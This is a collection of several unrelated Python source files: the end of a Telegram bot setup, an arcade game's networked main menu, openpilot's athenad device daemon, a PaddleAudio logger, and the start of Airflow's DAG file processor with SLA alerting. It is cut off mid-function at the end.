DURATION: [RegexHandler('^([0-9]+|{0}|{1})$'.format(str(lib.cancel), str(lib.panic)), __duration),
RegexHandler('^{0}$'.format(lib.stop_bot), __stop)],
GROUPING: [CallbackQueryHandler(__grouping, pass_chat_data=True),
RegexHandler('^({0}|{1}|{2})$'.format(
str(lib.cancel), str(lib.btn_finished), str(selection)),
__selection)]
},
fallbacks=[CommandHandler('stop', __stop)],
allow_reentry=True,
per_chat=True,
per_user=True
)
dp.add_error_handler(__error)
dp.add_handler(emergency_stop_handler)
dp.add_handler(help_handler)
dp.add_handler(ch)
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
|
mainmenuview.py
|
import arcade
import logging
from ..gameconstants import SCREEN_WIDTH, SCREEN_HEIGHT, GAME_PATH
from multiprocessing import Process, Queue
from .gameview import GameView
from ..networking.net_interface import Pipe
import os
from textwrap import dedent
DATA_PATH = f"{GAME_PATH}/data"
def networking(forward, feedback):
while True:
pipe = Pipe(server=os.getenv("SERVER"), port=int(os.getenv("PORT")))
response = pipe.login()
feedback.put(response)
if response:
break
while True:
response = pipe.await_response()
if response[0] == "Team count":
feedback.put(response[:2])
elif response[0] == "Start":
feedback.put(["Start", response[1]])
break
while True:
items_no = forward.qsize()
for _ in range(items_no - 2):
forward.get()
data = list(forward.get())
feedback.put(pipe.transport(data))
class MainMenuView(arcade.View):
def __init__(self):
super().__init__()
self.theme = None
self.half_width = SCREEN_WIDTH / 2
self.half_height = SCREEN_HEIGHT / 2
self.background = None
self.status = "Connecting to server..."
self.connected = False
self.forward = Queue()
self.feedback = Queue()
self.start = arcade.load_sound(f"{DATA_PATH}/start.wav")
def on_show(self) -> None:
pass
def on_draw(self) -> None:
arcade.start_render()
arcade.draw_lrwh_rectangle_textured(
0, 0, SCREEN_WIDTH, SCREEN_HEIGHT, self.background
)
arcade.draw_text(
dedent(self.status),
550,
100,
arcade.color.WHITE,
font_size=15,
anchor_x="center",
)
def setup(self) -> None:
"""Initialize the menu."""
self.background = arcade.load_texture(f"{DATA_PATH}/b2.gif")
sync = Process(target=networking, args=(self.forward, self.feedback,))
sync.start()
def on_update(self, delta_time: float):
if not self.feedback.empty():
success = self.feedback.get()
if not self.connected:
if success:
logging.info("Connected")
self.status = "Waiting for other players... (1)"
self.connected = True
else:
logging.info("Cannot connect to server")
self.status = "Error in connection (Retrying)"
else:
if success[0] == "Team count":
self.status = f"Waiting for other players... ({success[1]})"
elif success[0] == "Start":
logging.info("Starting game")
self.status = "Launching game"
self.start.play(volume=0.5)
game_view = GameView()
self.window.show_view(game_view)
game_view.setup(self.forward, self.feedback, success[1])
|
athenad.py
|
#!/usr/bin/env python3
import base64
import hashlib
import io
import json
import os
import sys
import queue
import random
import select
import socket
import threading
import time
from collections import namedtuple
from functools import partial
from typing import Any
import requests
from jsonrpc import JSONRPCResponseManager, dispatcher
from websocket import ABNF, WebSocketTimeoutException, WebSocketException, create_connection
import cereal.messaging as messaging
from cereal.services import service_list
from common.api import Api
from common.file_helpers import CallbackReader
from common.basedir import PERSIST
from common.params import Params
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE, PC
from selfdrive.loggerd.config import ROOT
from selfdrive.loggerd.xattr_cache import getxattr, setxattr
from selfdrive.swaglog import cloudlog, SWAGLOG_DIR
from selfdrive.version import get_version, get_origin, get_short_branch, get_commit
ATHENA_HOST = os.getenv('ATHENA_HOST', 'wss://athena.comma.ai')
HANDLER_THREADS = int(os.getenv('HANDLER_THREADS', "4"))
LOCAL_PORT_WHITELIST = set([8022])
LOG_ATTR_NAME = 'user.upload'
LOG_ATTR_VALUE_MAX_UNIX_TIME = int.to_bytes(2147483647, 4, sys.byteorder)
RECONNECT_TIMEOUT_S = 70
RETRY_DELAY = 10 # seconds
MAX_RETRY_COUNT = 30 # Try for at most 5 minutes if upload fails immediately
WS_FRAME_SIZE = 4096
dispatcher["echo"] = lambda s: s
recv_queue: Any = queue.Queue()
send_queue: Any = queue.Queue()
upload_queue: Any = queue.Queue()
log_send_queue: Any = queue.Queue()
log_recv_queue: Any = queue.Queue()
cancelled_uploads: Any = set()
UploadItem = namedtuple('UploadItem', ['path', 'url', 'headers', 'created_at', 'id', 'retry_count', 'current', 'progress'], defaults=(0, False, 0))
cur_upload_items = {}
def handle_long_poll(ws):
end_event = threading.Event()
threads = [
threading.Thread(target=ws_recv, args=(ws, end_event), name='ws_recv'),
threading.Thread(target=ws_send, args=(ws, end_event), name='ws_send'),
threading.Thread(target=upload_handler, args=(end_event,), name='upload_handler'),
threading.Thread(target=log_handler, args=(end_event,), name='log_handler'),
] + [
threading.Thread(target=jsonrpc_handler, args=(end_event,), name=f'worker_{x}')
for x in range(HANDLER_THREADS)
]
for thread in threads:
thread.start()
try:
while not end_event.is_set():
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
end_event.set()
raise
finally:
for thread in threads:
cloudlog.debug(f"athena.joining {thread.name}")
thread.join()
def jsonrpc_handler(end_event):
dispatcher["startLocalProxy"] = partial(startLocalProxy, end_event)
while not end_event.is_set():
try:
data = recv_queue.get(timeout=1)
if "method" in data:
cloudlog.debug(f"athena.jsonrpc_handler.call_method {data}")
response = JSONRPCResponseManager.handle(data, dispatcher)
send_queue.put_nowait(response.json)
elif "id" in data and ("result" in data or "error" in data):
log_recv_queue.put_nowait(data)
else:
raise Exception("not a valid request or response")
except queue.Empty:
pass
except Exception as e:
cloudlog.exception("athena jsonrpc handler failed")
send_queue.put_nowait(json.dumps({"error": str(e)}))
def upload_handler(end_event):
tid = threading.get_ident()
while not end_event.is_set():
cur_upload_items[tid] = None
try:
cur_upload_items[tid] = upload_queue.get(timeout=1)._replace(current=True)
if cur_upload_items[tid].id in cancelled_uploads:
cancelled_uploads.remove(cur_upload_items[tid].id)
continue
try:
def cb(sz, cur):
cur_upload_items[tid] = cur_upload_items[tid]._replace(progress=cur / sz if sz else 1)
_do_upload(cur_upload_items[tid], cb)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError, requests.exceptions.SSLError) as e:
cloudlog.warning(f"athena.upload_handler.retry {e} {cur_upload_items[tid]}")
if cur_upload_items[tid].retry_count < MAX_RETRY_COUNT:
item = cur_upload_items[tid]
item = item._replace(
retry_count=item.retry_count + 1,
progress=0,
current=False
)
upload_queue.put_nowait(item)
cur_upload_items[tid] = None
for _ in range(RETRY_DELAY):
time.sleep(1)
if end_event.is_set():
break
except queue.Empty:
pass
except Exception:
cloudlog.exception("athena.upload_handler.exception")
def _do_upload(upload_item, callback=None):
with open(upload_item.path, "rb") as f:
size = os.fstat(f.fileno()).st_size
if callback:
f = CallbackReader(f, callback, size)
return requests.put(upload_item.url,
data=f,
headers={**upload_item.headers, 'Content-Length': str(size)},
timeout=30)
# security: user should be able to request any message from their car
@dispatcher.add_method
def getMessage(service=None, timeout=1000):
if service is None or service not in service_list:
raise Exception("invalid service")
socket = messaging.sub_sock(service, timeout=timeout)
ret = messaging.recv_one(socket)
if ret is None:
raise TimeoutError
return ret.to_dict()
@dispatcher.add_method
def getVersion():
return {
"version": get_version(),
"remote": get_origin(),
"branch": get_short_branch(),
"commit": get_commit(),
}
@dispatcher.add_method
def setNavDestination(latitude=0, longitude=0):
destination = {
"latitude": latitude,
"longitude": longitude,
}
Params().put("NavDestination", json.dumps(destination))
return {"success": 1}
def scan_dir(path, prefix):
files = list()
# only walk directories that match the prefix
# (glob and friends traverse entire dir tree)
with os.scandir(path) as i:
for e in i:
rel_path = os.path.relpath(e.path, ROOT)
if e.is_dir(follow_symlinks=False):
# add trailing slash
rel_path = os.path.join(rel_path, '')
# if prefix is a partial dir name, current dir will start with prefix
# if prefix is a partial file name, prefix with start with dir name
if rel_path.startswith(prefix) or prefix.startswith(rel_path):
files.extend(scan_dir(e.path, prefix))
else:
if rel_path.startswith(prefix):
files.append(rel_path)
return files
@dispatcher.add_method
def listDataDirectory(prefix=''):
return scan_dir(ROOT, prefix)
@dispatcher.add_method
def reboot():
sock = messaging.sub_sock("deviceState", timeout=1000)
ret = messaging.recv_one(sock)
if ret is None or ret.deviceState.started:
raise Exception("Reboot unavailable")
def do_reboot():
time.sleep(2)
HARDWARE.reboot()
threading.Thread(target=do_reboot).start()
return {"success": 1}
@dispatcher.add_method
def uploadFileToUrl(fn, url, headers):
if len(fn) == 0 or fn[0] == '/' or '..' in fn:
return 500
path = os.path.join(ROOT, fn)
if not os.path.exists(path):
return 404
item = UploadItem(path=path, url=url, headers=headers, created_at=int(time.time() * 1000), id=None)
upload_id = hashlib.sha1(str(item).encode()).hexdigest()
item = item._replace(id=upload_id)
upload_queue.put_nowait(item)
return {"enqueued": 1, "item": item._asdict()}
@dispatcher.add_method
def listUploadQueue():
items = list(upload_queue.queue) + list(cur_upload_items.values())
return [i._asdict() for i in items if (i is not None) and (i.id not in cancelled_uploads)]
@dispatcher.add_method
def cancelUpload(upload_id):
upload_ids = set(item.id for item in list(upload_queue.queue))
if upload_id not in upload_ids:
return 404
cancelled_uploads.add(upload_id)
return {"success": 1}
@dispatcher.add_method
def primeActivated(activated):
return {"success": 1}
def startLocalProxy(global_end_event, remote_ws_uri, local_port):
try:
if local_port not in LOCAL_PORT_WHITELIST:
raise Exception("Requested local port not whitelisted")
cloudlog.debug("athena.startLocalProxy.starting")
params = Params()
dongle_id = params.get("DongleId").decode('utf8')
identity_token = Api(dongle_id).get_token()
ws = create_connection(remote_ws_uri,
cookie="jwt=" + identity_token,
enable_multithread=True)
ssock, csock = socket.socketpair()
local_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_sock.connect(('127.0.0.1', local_port))
local_sock.setblocking(0)
proxy_end_event = threading.Event()
threads = [
threading.Thread(target=ws_proxy_recv, args=(ws, local_sock, ssock, proxy_end_event, global_end_event)),
threading.Thread(target=ws_proxy_send, args=(ws, local_sock, csock, proxy_end_event))
]
for thread in threads:
thread.start()
cloudlog.debug("athena.startLocalProxy.started")
return {"success": 1}
except Exception as e:
cloudlog.exception("athenad.startLocalProxy.exception")
raise e
@dispatcher.add_method
def getPublicKey():
if not os.path.isfile(PERSIST + '/comma/id_rsa.pub'):
return None
with open(PERSIST + '/comma/id_rsa.pub', 'r') as f:
return f.read()
@dispatcher.add_method
def getSshAuthorizedKeys():
return Params().get("GithubSshKeys", encoding='utf8') or ''
@dispatcher.add_method
def getSimInfo():
return HARDWARE.get_sim_info()
@dispatcher.add_method
def getNetworkType():
return HARDWARE.get_network_type()
@dispatcher.add_method
def getNetworks():
return HARDWARE.get_networks()
@dispatcher.add_method
def takeSnapshot():
from selfdrive.camerad.snapshot.snapshot import snapshot, jpeg_write
ret = snapshot()
if ret is not None:
def b64jpeg(x):
if x is not None:
f = io.BytesIO()
jpeg_write(f, x)
return base64.b64encode(f.getvalue()).decode("utf-8")
else:
return None
return {'jpegBack': b64jpeg(ret[0]),
'jpegFront': b64jpeg(ret[1])}
else:
raise Exception("not available while camerad is started")
def get_logs_to_send_sorted():
# TODO: scan once then use inotify to detect file creation/deletion
curr_time = int(time.time())
logs = []
for log_entry in os.listdir(SWAGLOG_DIR):
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
time_sent = int.from_bytes(getxattr(log_path, LOG_ATTR_NAME), sys.byteorder)
except (ValueError, TypeError):
time_sent = 0
# assume send failed and we lost the response if sent more than one hour ago
if not time_sent or curr_time - time_sent > 3600:
logs.append(log_entry)
# excluding most recent (active) log file
return sorted(logs)[:-1]
def log_handler(end_event):
if PC:
return
log_files = []
last_scan = 0
while not end_event.is_set():
try:
curr_scan = sec_since_boot()
if curr_scan - last_scan > 10:
log_files = get_logs_to_send_sorted()
last_scan = curr_scan
# send one log
curr_log = None
if len(log_files) > 0:
log_entry = log_files.pop() # newest log file
cloudlog.debug(f"athena.log_handler.forward_request {log_entry}")
try:
curr_time = int(time.time())
log_path = os.path.join(SWAGLOG_DIR, log_entry)
setxattr(log_path, LOG_ATTR_NAME, int.to_bytes(curr_time, 4, sys.byteorder))
with open(log_path, "r") as f:
jsonrpc = {
"method": "forwardLogs",
"params": {
"logs": f.read()
},
"jsonrpc": "2.0",
"id": log_entry
}
log_send_queue.put_nowait(json.dumps(jsonrpc))
curr_log = log_entry
except OSError:
pass # file could be deleted by log rotation
# wait for response up to ~100 seconds
# always read queue at least once to process any old responses that arrive
for _ in range(100):
if end_event.is_set():
break
try:
log_resp = json.loads(log_recv_queue.get(timeout=1))
log_entry = log_resp.get("id")
log_success = "result" in log_resp and log_resp["result"].get("success")
cloudlog.debug(f"athena.log_handler.forward_response {log_entry} {log_success}")
if log_entry and log_success:
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
setxattr(log_path, LOG_ATTR_NAME, LOG_ATTR_VALUE_MAX_UNIX_TIME)
except OSError:
pass # file could be deleted by log rotation
if curr_log == log_entry:
break
except queue.Empty:
if curr_log is None:
break
except Exception:
cloudlog.exception("athena.log_handler.exception")
def ws_proxy_recv(ws, local_sock, ssock, end_event, global_end_event):
while not (end_event.is_set() or global_end_event.is_set()):
try:
data = ws.recv()
local_sock.sendall(data)
except WebSocketTimeoutException:
pass
except Exception:
cloudlog.exception("athenad.ws_proxy_recv.exception")
break
cloudlog.debug("athena.ws_proxy_recv closing sockets")
ssock.close()
local_sock.close()
cloudlog.debug("athena.ws_proxy_recv done closing sockets")
end_event.set()
def ws_proxy_send(ws, local_sock, signal_sock, end_event):
while not end_event.is_set():
try:
r, _, _ = select.select((local_sock, signal_sock), (), ())
if r:
if r[0].fileno() == signal_sock.fileno():
# got end signal from ws_proxy_recv
end_event.set()
break
data = local_sock.recv(4096)
if not data:
# local_sock is dead
end_event.set()
break
ws.send(data, ABNF.OPCODE_BINARY)
except Exception:
cloudlog.exception("athenad.ws_proxy_send.exception")
end_event.set()
cloudlog.debug("athena.ws_proxy_send closing sockets")
signal_sock.close()
cloudlog.debug("athena.ws_proxy_send done closing sockets")
def ws_recv(ws, end_event):
last_ping = int(sec_since_boot() * 1e9)
while not end_event.is_set():
try:
opcode, data = ws.recv_data(control_frame=True)
if opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
if opcode == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
recv_queue.put_nowait(data)
elif opcode == ABNF.OPCODE_PING:
last_ping = int(sec_since_boot() * 1e9)
Params().put("LastAthenaPingTime", str(last_ping))
except WebSocketTimeoutException:
ns_since_last_ping = int(sec_since_boot() * 1e9) - last_ping
if ns_since_last_ping > RECONNECT_TIMEOUT_S * 1e9:
cloudlog.exception("athenad.ws_recv.timeout")
end_event.set()
except Exception:
cloudlog.exception("athenad.ws_recv.exception")
end_event.set()
def ws_send(ws, end_event):
while not end_event.is_set():
try:
try:
data = send_queue.get_nowait()
except queue.Empty:
data = log_send_queue.get(timeout=1)
for i in range(0, len(data), WS_FRAME_SIZE):
frame = data[i:i+WS_FRAME_SIZE]
last = i + WS_FRAME_SIZE >= len(data)
opcode = ABNF.OPCODE_TEXT if i == 0 else ABNF.OPCODE_CONT
ws.send_frame(ABNF.create_frame(frame, opcode, last))
except queue.Empty:
pass
except Exception:
cloudlog.exception("athenad.ws_send.exception")
end_event.set()
def backoff(retries):
return random.randrange(0, min(128, int(2 ** retries)))
def main():
params = Params()
dongle_id = params.get("DongleId", encoding='utf-8')
ws_uri = ATHENA_HOST + "/ws/v2/" + dongle_id
api = Api(dongle_id)
conn_retries = 0
while 1:
try:
cloudlog.event("athenad.main.connecting_ws", ws_uri=ws_uri)
ws = create_connection(ws_uri,
cookie="jwt=" + api.get_token(),
enable_multithread=True,
timeout=30.0)
cloudlog.event("athenad.main.connected_ws", ws_uri=ws_uri)
params.delete("PrimeRedirected")
conn_retries = 0
cur_upload_items.clear()
handle_long_poll(ws)
except (KeyboardInterrupt, SystemExit):
break
except (ConnectionError, TimeoutError, WebSocketException):
conn_retries += 1
params.delete("PrimeRedirected")
params.delete("LastAthenaPingTime")
except socket.timeout:
try:
r = requests.get("http://api.commadotai.com/v1/me", allow_redirects=False,
headers={"User-Agent": f"openpilot-{get_version()}"}, timeout=15.0)
if r.status_code == 302 and r.headers['Location'].startswith("http://u.web2go.com"):
params.put_bool("PrimeRedirected", True)
except Exception:
cloudlog.exception("athenad.socket_timeout.exception")
params.delete("LastAthenaPingTime")
except Exception:
cloudlog.exception("athenad.main.exception")
conn_retries += 1
params.delete("PrimeRedirected")
params.delete("LastAthenaPingTime")
time.sleep(backoff(conn_retries))
if __name__ == "__main__":
main()
|
log.py
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
import copy
import functools
import logging
import os
import sys
import threading
import time
from typing import List
import colorlog
from colorama import Fore
loggers = {}
log_config = {
'DEBUG': {
'level': 10,
'color': 'purple'
},
'INFO': {
'level': 20,
'color': 'green'
},
'TRAIN': {
'level': 21,
'color': 'cyan'
},
'EVAL': {
'level': 22,
'color': 'blue'
},
'WARNING': {
'level': 30,
'color': 'yellow'
},
'ERROR': {
'level': 40,
'color': 'red'
},
'CRITICAL': {
'level': 50,
'color': 'bold_red'
}
}
class Logger(object):
'''
    Default logger in PaddleAudio
Args:
name(str) : Logger name, default is 'PaddleAudio'
'''
def __init__(self, name: str = None):
name = 'PaddleAudio' if not name else name
self.logger = logging.getLogger(name)
for key, conf in log_config.items():
logging.addLevelName(conf['level'], key)
self.__dict__[key] = functools.partial(self.__call__, conf['level'])
self.__dict__[key.lower()] = functools.partial(self.__call__, conf['level'])
self.format = colorlog.ColoredFormatter('%(log_color)s[%(asctime)-15s] [%(levelname)8s]%(reset)s - %(message)s',
log_colors={key: conf['color']
for key, conf in log_config.items()})
self.handler = logging.StreamHandler()
self.handler.setFormatter(self.format)
self.logger.addHandler(self.handler)
self.logLevel = 'DEBUG'
self.logger.setLevel(logging.DEBUG)
self.logger.propagate = False
self._is_enable = True
def disable(self):
self._is_enable = False
def enable(self):
self._is_enable = True
@property
def is_enable(self) -> bool:
return self._is_enable
def __call__(self, log_level: str, msg: str):
if not self.is_enable:
return
self.logger.log(log_level, msg)
@contextlib.contextmanager
def use_terminator(self, terminator: str):
old_terminator = self.handler.terminator
self.handler.terminator = terminator
yield
self.handler.terminator = old_terminator
@contextlib.contextmanager
def processing(self, msg: str, interval: float = 0.1):
'''
Continuously print a progress bar with rotating special effects.
Args:
msg(str): Message to be printed.
interval(float): Rotation interval. Default to 0.1.
'''
end = False
def _printer():
index = 0
flags = ['\\', '|', '/', '-']
while not end:
flag = flags[index % len(flags)]
with self.use_terminator('\r'):
self.info('{}: {}'.format(msg, flag))
time.sleep(interval)
index += 1
t = threading.Thread(target=_printer)
t.start()
yield
end = True
logger = Logger()
|
scheduler_job.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from contextlib import redirect_stderr, redirect_stdout
from datetime import timedelta
from typing import List, Set
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm.session import make_transient
from airflow import models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException, TaskNotFound
from airflow.executors.local_executor import LocalExecutor
from airflow.executors.sequential_executor import SequentialExecutor
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagRun, SlaMiss, errors
from airflow.models.taskinstance import SimpleTaskInstance
from airflow.stats import Stats
from airflow.ti_deps.dep_context import SCHEDULED_DEPS, DepContext
from airflow.ti_deps.deps.pool_slots_available_dep import STATES_TO_COUNT_AS_RUNNING
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (
AbstractDagFileProcessorProcess, DagFileProcessorAgent, SimpleDag, SimpleDagBag,
)
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.file import list_py_file_paths
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.session import provide_session
from airflow.utils.state import State
class DagFileProcessorProcess(AbstractDagFileProcessorProcess, LoggingMixin):
"""Runs DAG processing in a separate process using DagFileProcessor
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: str
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
    :param dag_id_white_list: If specified, only look at these DAG IDs
:type dag_id_white_list: List[str]
:param zombies: zombie task instances to kill
:type zombies: List[airflow.models.taskinstance.SimpleTaskInstance]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(self, file_path, pickle_dags, dag_id_white_list, zombies):
self._file_path = file_path
        # The process that was launched to process the given file path.
self._process = None
self._dag_id_white_list = dag_id_white_list
self._pickle_dags = pickle_dags
self._zombies = zombies
        # The result of DagFileProcessor.process_file(file_path).
self._result = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time = None
        # This ID is used to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessorProcess.class_creation_counter
DagFileProcessorProcess.class_creation_counter += 1
@property
def file_path(self):
return self._file_path
@staticmethod
def _run_file_processor(result_channel,
file_path,
pickle_dags,
dag_id_white_list,
thread_name,
zombies):
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: str
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
        :param dag_id_white_list: if specified, only examine DAG IDs that are
in this list
:type dag_id_white_list: list[str]
:param thread_name: the name to use for the process that is launched
:type thread_name: str
:param zombies: zombie task instances to kill
:type zombies: list[airflow.models.taskinstance.SimpleTaskInstance]
        :return: nothing; the result of processing is sent back to the parent
            process through ``result_channel``
"""
# This helper runs in the newly created process
log = logging.getLogger("airflow.processor")
set_context(log, file_path)
setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
try:
# redirect stdout/stderr to log
with redirect_stdout(StreamLogWriter(log, logging.INFO)),\
redirect_stderr(StreamLogWriter(log, logging.WARN)):
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
start_time = time.time()
log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
dag_file_processor = DagFileProcessor(dag_ids=dag_id_white_list, log=log)
result = dag_file_processor.process_file(
file_path=file_path,
zombies=zombies,
pickle_dags=pickle_dags
)
result_channel.send(result)
end_time = time.time()
log.info(
"Processing %s took %.3f seconds", file_path, end_time - start_time
)
except Exception:
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
result_channel.close()
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
def start(self):
"""
Launch the process and start processing the DAG.
"""
self._parent_channel, _child_channel = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
self.file_path,
self._pickle_dags,
self._dag_id_white_list,
"DagFileProcessor{}".format(self._instance_id),
self._zombies
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._start_time = timezone.utcnow()
self._process.start()
def kill(self):
"""
Kill the process launched to process the file, and ensure consistent state.
"""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
# The queue will likely get corrupted, so remove the reference
self._result_queue = None
self._kill_process()
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
self._process.join(5)
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self):
if self._process.is_alive():
self.log.warning("Killing PID %s", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
@property
def pid(self):
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
pass
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self):
"""
        :return: result of running DagFileProcessor.process_file()
        :rtype: Tuple[List[airflow.utils.dag_processing.SimpleDag], int]
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self):
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
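# Lifecycle sketch for the processor above (illustrative only; the file path and the empty
# zombie list are assumptions, not values used by the scheduler):
#
#     processor = DagFileProcessorProcess('/path/to/dags/example_dag.py',
#                                         pickle_dags=False,
#                                         dag_id_white_list=[],
#                                         zombies=[])
#     processor.start()
#     while not processor.done:
#         time.sleep(0.1)
#     simple_dags, import_error_count = processor.result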
class DagFileProcessor(LoggingMixin):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
    :param dag_ids: If specified, only look at these DAG IDs
:type dag_ids: List[str]
:param log: Logger to save the processing process
:type log: logging.Logger
"""
def __init__(self, dag_ids, log):
self.dag_ids = dag_ids
self._log = log
@provide_session
def manage_slas(self, dag, session=None):
"""
Finding all tasks that have SLAs defined, and sending alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any([isinstance(ti.sla, timedelta) for ti in dag.tasks]):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
TI = models.TaskInstance
sq = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti')
)
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(
or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED
)
)
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
max_tis = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == sq.c.task_id,
TI.execution_date == sq.c.max_ti,
).all()
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
dttm = ti.execution_date
if isinstance(task.sla, timedelta):
dttm = dag.following_schedule(dttm)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
dttm = dag.following_schedule(dttm)
session.commit()
slas = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas:
sla_dates = [sla.execution_date for sla in slas]
qry = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis = []
for ti in qry:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception:
self.log.exception("Could not call sla_miss_callback for DAG %s",
dag.dag_id)
email_content = """\
Here's a list of tasks that missed their SLAs:
            <pre><code>{task_list}\n</code></pre>
Blocking tasks:
            <pre><code>{blocking_task_list}\n{bug}</code></pre>
""".format(task_list=task_list, blocking_task_list=blocking_task_list,
bug=asciiart.bug)
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.",
sla.task_id)
continue
tasks_missed_sla.append(task)
emails = set()
for task in tasks_missed_sla:
if task.email:
